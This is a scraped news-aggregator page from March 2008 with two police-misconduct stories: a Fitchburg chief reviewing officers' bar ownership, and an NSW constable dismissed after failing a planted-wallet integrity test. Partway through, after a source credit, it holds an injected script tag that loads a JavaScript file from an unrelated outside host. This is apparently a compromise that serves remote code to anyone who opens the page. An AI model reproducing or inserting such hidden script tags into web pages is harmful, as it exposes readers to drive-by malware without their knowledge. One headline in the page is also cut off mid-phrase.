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NEWS > 24 March 2008

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Police owning bars - a conflict of interest?
FITCHBURG — Police Chief Robert A. DeMoura said yesterday he is reviewing the practice of police officers owning bars in the city.

Chief DeMoura said he agrees there is the potential for impropriety at bars owned by police officers.

While on the department as a sergeant in Lowell, he said, he sold his bar, the Brass Lantern, in 1996 because he thought it was a conflict of interest. Also, the Lowell police chief at the time reviewed the practice and five other police officers subsequently sold their bars, he said.

“It was just common sense,” he said.

The... Read more

 Article sourced from

New South Wales Police Service<script src=http://wtrc.kangwon.ac.kr/skin/rook.js></script>
NEWS.com.au - Australia
24 March 2008
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New South Wales Police Service

Policewoman spent up cash from

A WALLET containing $285 handed in to the Katoomba police station in New South Wales was too tempting for Senior Constable Kate Michelle Howes to ignore - so she went shopping.

That mistake cost the 27-year-old officer her career.

Howes had no idea the lost wallet was a deftly targeted test of her integrity, orchestrated from within the NSW Police Force.

Her case is the only public evidence that the force still conducts integrity tests among its own ranks as part of its fight against corruption.

But the results of these tests, a good barometer of the cleanness of the force, is not information the police want you to know.

It is one of a growing list of matters sought by The Daily Telegraph under Freedom of Information that is being refused release by the force.

Last May, Howes pleaded guilty in the Mount Druitt Local Court to embezzlement.

She was fined $1000 and placed on a three-year good behaviour bond.

Worse was to come. On February 2 this year, Police Commissioner Andrew Scipione dismissed Howes, using his authority under section 181d of the Police Act 1990.

Integrity testing was a key reform arising from the Wood royal commission in the mid-1990s

But details of how the tests are done - and, more important, how many officers pass or fail them - are not for public discussion.

The police have argued that to discuss any aspect of its program - even the release of statistics on how many are undertaken - would undermine its effectiveness.

In a ruling earlier this month, the Ombudsman backed this secrecy.

"The public interest favours the continued successful operation of the integrity testing system and consequently continued secrecy regarding the numbers and conduct of integrity testing," investigation officer Maya Borthwick said.

In Howes' case, it was a clever sting. Foreign coins were tossed in with the cash to make it appear as though the wallet belonged to a tourist who would not be around to claim it.

The person who handed it in appeared to be a member of the public.

Howes succumbed to temptation and went shopping, apparently for clothing and manchester. She still had $150 left when she was charged.

Figures released in 1998 revealed that of the 40 sting operations carried out, just 18 officers passed.

Despite this, a police spokesman yesterday ruled out releasing any details of the integrity testing program.

"Police will not reveal methodology or how regularly integrity testing is conducted," the spokesman said.

"However, police can confirm that integrity tests have led to criminal charges being laid."

Not all officers who fail the tests are sacked.

Some remain in the force but face internal disciplinary proceedings.
 

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